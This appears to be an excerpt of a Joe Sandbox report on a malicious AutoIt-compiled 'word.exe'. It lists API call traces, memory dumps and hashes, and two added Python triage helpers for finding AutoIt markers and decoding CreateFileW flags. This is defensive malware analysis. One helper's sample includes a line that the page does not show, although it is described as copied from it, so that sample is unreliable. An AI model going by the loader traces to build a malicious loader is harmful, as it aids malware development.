                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                            • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                            • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                            • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
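Two of the functions above give away what the dropped word.exe is: the routine at 40f450 walks the file with _fseek/__fread_nolock and references the strings "AU3!" and "EA06", and the routine at 4103e0 registers windows with the class/title strings "AutoIt v3" and "edit". Together these are the markers of a compiled AutoIt v3 binary carrying an embedded script. The triage helper below is an added example, not part of the Joe Sandbox report or of the sample: it scans a file image for those markers and reports their offsets. Treating "AU3!EA06" as one contiguous 8-byte marker is the usual AutoIt3 layout but is an assumption about this particular sample, and the SAMPLE bytes are constructed padding, not data from the report.

```python
"""Triage helper: locate AutoIt v3 compiled-script markers in a file image.

Added example, not code from the sandbox report or from the analysed sample.
Marker strings are taken from the report's String IDs ("AU3!", "EA06",
"AutoIt v3"); joining "AU3!" and "EA06" into one marker is an assumption.
"""
import re
import sys
from dataclasses import dataclass

AU3_MARKER = b"AU3!EA06"                     # marker preceding the compiled script body (assumed contiguous)
AUTOIT_ASCII = b"AutoIt v3"                  # interpreter/window-class string, narrow form
AUTOIT_UTF16 = "AutoIt v3".encode("utf-16-le")  # wide form, as CreateWindowExW would take it


@dataclass(frozen=True)
class Hit:
    name: str
    offset: int


def find_markers(data: bytes) -> list[Hit]:
    """Return every marker occurrence with its byte offset, sorted by offset."""
    patterns = {
        "AU3!EA06": AU3_MARKER,
        "AutoIt v3 (ascii)": AUTOIT_ASCII,
        "AutoIt v3 (utf-16le)": AUTOIT_UTF16,
    }
    hits = []
    for name, pat in patterns.items():
        # re.escape on bytes keeps the '!' and spaces literal
        for m in re.finditer(re.escape(pat), data):
            hits.append(Hit(name, m.start()))
    return sorted(hits, key=lambda h: (h.offset, h.name))


def looks_like_compiled_autoit(data: bytes) -> bool:
    """Heuristic verdict: both the interpreter string and the script marker must be present.

    Either string alone is weak evidence (AutoIt is legitimate software and
    "AU3!EA06" can appear in a standalone .a3x script file); the combination
    is what the analysed word.exe shows.
    """
    names = {h.name for h in find_markers(data)}
    return "AU3!EA06" in names and any(n.startswith("AutoIt v3") for n in names)


def scan_file(path: str) -> list[Hit]:
    with open(path, "rb") as fh:
        return find_markers(fh.read())


# Constructed sample (not real malware bytes): a fake "MZ" header, the wide
# "AutoIt v3" string at offset 32 and the "AU3!EA06" marker at offset 66.
SAMPLE = (
    b"MZ" + b"\x00" * 30
    + AUTOIT_UTF16 + b"\x00" * 16
    + b"AU3!" + b"EA06" + b"\x00" * 8
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = SAMPLE
    for h in find_markers(blob):
        print(f"{h.offset:#010x}  {h.name}")
    print("compiled AutoIt binary:", looks_like_compiled_autoit(blob))
```

Run it as `python au3_markers.py C:\Users\user\AppData\Roaming\word.exe` against the dropped file to confirm the classification before spending time on the loader shellcode; the script body that follows the marker is what an AutoIt decompiler would extract next.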

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 3a45528 (non-PE memory region); basic blocks 3a45528–3a45730; calls subroutines 3a43178, 3a45418, 3a45458, 3a44418 and 3a454a8 and the APIs CreateFileW, VirtualAlloc, ReadFile and ExitProcess.
                                                                            APIs
                                                                              • Part of subcall function 03A45418: Sleep.KERNELBASE(000001F4), ref: 03A45429
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03A4566A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3a43000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: 12NE3S0D3QVD9
                                                                            • API String ID: 2694422964-394935102
                                                                            • Opcode ID: 43d47db788125fa54371ce7b4fb8163c5f14ada0bddc155299f6d8f1af0a0ef8
                                                                            • Instruction ID: f80de63eace3f8b9a120ab24883a95d65956b648840451b5878302709effefa7
                                                                            • Opcode Fuzzy Hash: 43d47db788125fa54371ce7b4fb8163c5f14ada0bddc155299f6d8f1af0a0ef8
                                                                            • Instruction Fuzzy Hash: 5B518E30E14248DBEF11DBE4D954BEEBB79AF59300F00459AE208BB2C0D7B91A45CB65

                                                                             Control-flow Graph
                                                                             • Rendered graph not reproduced. Function at 413a88; basic blocks 413a88–413b15; calls subroutines 41718c, 4171d1, 418407, 419f6d, 413ade, 419f9d, 417f23 and 417ee1 and the APIs HeapFree and GetLastError.

APIs
• __lock.LIBCMT ref: 00413AA6
  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
• ___sbh_find_block.LIBCMT ref: 00413AB1
• ___sbh_free_block.LIBCMT ref: 00413AC0
• HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
• GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0

Control-flow Graph [graph image omitted; legend: Executed / Not Executed]

APIs
  • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
• _strcat.LIBCMT ref: 0040F603
  • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
  • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
• String ID: HH
• API String ID: 1194219731-2761332787

APIs
• _memset.LIBCMT ref: 0040E202
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0

APIs
• _malloc.LIBCMT ref: 00411734
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
• std::bad_exception::bad_exception.LIBCMT ref: 0041176B
• __CxxThrowException@8.LIBCMT ref: 00411779
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0

APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH
• API String ID: 1143807570-3662162768

APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 03A44BD3
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03A44C8B
Memory Dump Source
• Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3a43000_word.jbxd
Similarity
• API ID: Process$CreateMemoryRead
• String ID:
• API String ID: 2726527582-0

Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

APIs
• _set_new_mode.LIBCMT ref: 0040D88C
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,001B2EB8), ref: 0040D8B9
• FreeLibrary.KERNEL32(?), ref: 0040D8CE
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: FreeInfoLibraryParametersSystem_set_new_mode
• String ID:
• API String ID: 1188159508-0

APIs
• RegOpenKeyExW.KERNEL32 ref: 0040F132
• RegQueryValueExW.KERNEL32(?,?,00000000,00000000,80000001,80000001), ref: 0040F14F
• RegCloseKey.ADVAPI32(00000000), ref: 0040F159
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0

APIs
• _malloc.LIBCMT ref: 00435278
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• _malloc.LIBCMT ref: 00435288
• _malloc.LIBCMT ref: 00435298
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0

APIs
• __lock.LIBCMT ref: 00411ACE
  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
• __decode_pointer.LIBCMT ref: 00411AD9
  • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
  • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00000003,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
  • Part of subcall function 004169E9: RtlDecodePointer.NTDLL(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A50
• __encode_pointer.LIBCMT ref: 00411AE3
  • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
  • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
  • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
  • Part of subcall function 0041832D: LeaveCriticalSection.KERNEL32(?,00413AE5,00000004,00413AD3,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004), ref: 0041833C
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CriticalPointerSection$DecodeEncodeEnterLeave__amsg_exit__decode_pointer__encode_pointer__lock__mtinitlocknum
                                                                            • String ID:
                                                                            • API String ID: 741361212-0
                                                                            • Opcode ID: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                                                                            • Instruction ID: 38d776d816f70f727deb20f5ce19c96205530670ca88b6e54865c94596e56b2a
                                                                            • Opcode Fuzzy Hash: edb43eca56ef027ac361edaff2b5e89f00094b9356cce8bc8a346a0e55979942
                                                                            • Instruction Fuzzy Hash: B9D05EB1A00318B7CA0037E69C07ADA3E45CB407A8F0604BFFB0857252ED3AC85082DD
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00401B71
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: @EXITCODE
                                                                            • API String ID: 580348202-3436989551
                                                                            • Opcode ID: 6cf3cde66a08f965a4344bc1fc3281b19b19243cf66827a1cf885af4ed451a9e
                                                                            • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                            • Opcode Fuzzy Hash: 6cf3cde66a08f965a4344bc1fc3281b19b19243cf66827a1cf885af4ed451a9e
                                                                            • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 2e6ad9008194001af4a6ffaf6d5577c9fc0db539bc07221a9f788acfd60c8b7c
                                                                            • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                            • Opcode Fuzzy Hash: 2e6ad9008194001af4a6ffaf6d5577c9fc0db539bc07221a9f788acfd60c8b7c
                                                                            • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040F00A
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004299D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                            • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                            • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                            • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
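The two CreateFileW call sites in the record above are only readable once the raw hexadecimal arguments are mapped back to Win32 flags: the first opens an existing file read-only, the second opens or creates a file for read and write. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin. It parses the report's "api.module(args), ref: address" lines (the line shape is inferred from the listings on this page and is an assumption), decodes the CreateFileW parameters with the documented Win32 constant values, and flags sites that can create or modify a file. The sample lines are copied from this page's API listings; the "ref" values are virtual addresses inside the image the dump header places at 0x400000.

```python
"""Pull API call sites out of Joe Sandbox 'APIs' lines and decode CreateFileW intent."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Constructed sample: four lines copied verbatim from the per-function API
# listings on this page (bullet and spacing as the page shows them).
SAMPLE_LINES = """\
• __lock.LIBCMT ref: 00411ACE
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040F00A
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004299D9
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
"""

# Assumed line shape: <api>.<module>(<hex args>), ref: <call-site VA>.
# Arguments the sandbox could not resolve are printed as '?'; CRT-internal
# entries such as __lock.LIBCMT carry no argument list at all.
LINE_RE = re.compile(
    r"(?P<api>[\w:@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

Arg = Union[int, str, None]


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                 # call-site VA; image base is 0x400000 per the dump header
    args: List[Arg] = field(default_factory=list)


def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None          # unresolved by the sandbox
    try:
        return int(token, 16)
    except ValueError:
        return token         # inline string argument, kept as-is


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return one ApiCall per line that matches the report's call-site format."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), int(m.group("ref"), 16), args))
    return calls


# Documented Win32 values for the CreateFileW parameters.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_flags(value: int, table: dict) -> List[str]:
    """Expand a bitmask into the names in `table`; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return names or ["0"]


def decode_createfile(call: ApiCall) -> Optional[dict]:
    """Summarise a CreateFileW call site; None for other APIs or unresolved numeric args."""
    if call.api != "CreateFileW" or len(call.args) < 7:
        return None
    access, share, _sec, disposition, attrs = call.args[1:6]
    if not all(isinstance(v, int) for v in (access, share, disposition, attrs)):
        return None
    # A site can create or modify a file if it asks for write access or uses a
    # disposition other than OPEN_EXISTING.
    may_write = bool(access & 0x40000000) or disposition in (1, 2, 4, 5)
    return {
        "ref": f"{call.ref:08X}",
        "module": call.module,
        "access": decode_flags(access, ACCESS),
        "share": decode_flags(share, SHARE),
        "disposition": DISPOSITION.get(disposition, hex(disposition)),
        "attributes": hex(attrs),
        "may_write": may_write,
    }


def createfile_sites(text: str) -> List[dict]:
    """Decode every CreateFileW call site found in a block of report lines."""
    return [d for d in (decode_createfile(c) for c in parse_api_lines(text)) if d]


if __name__ == "__main__":
    for site in createfile_sites(SAMPLE_LINES):
        print(site)
```

Run against the sample, site 0040F00A decodes to GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING (a read-only open of a file that must already exist) and site 004299D9 to GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_ALWAYS (the file is created if absent), which is the site to look at first when checking the report's file-drop behaviour. The parser accepts the CRT-internal lines without an argument list so it can be pointed at a whole "APIs" block, but it does not attempt to handle an argument string containing a closing parenthesis.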
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
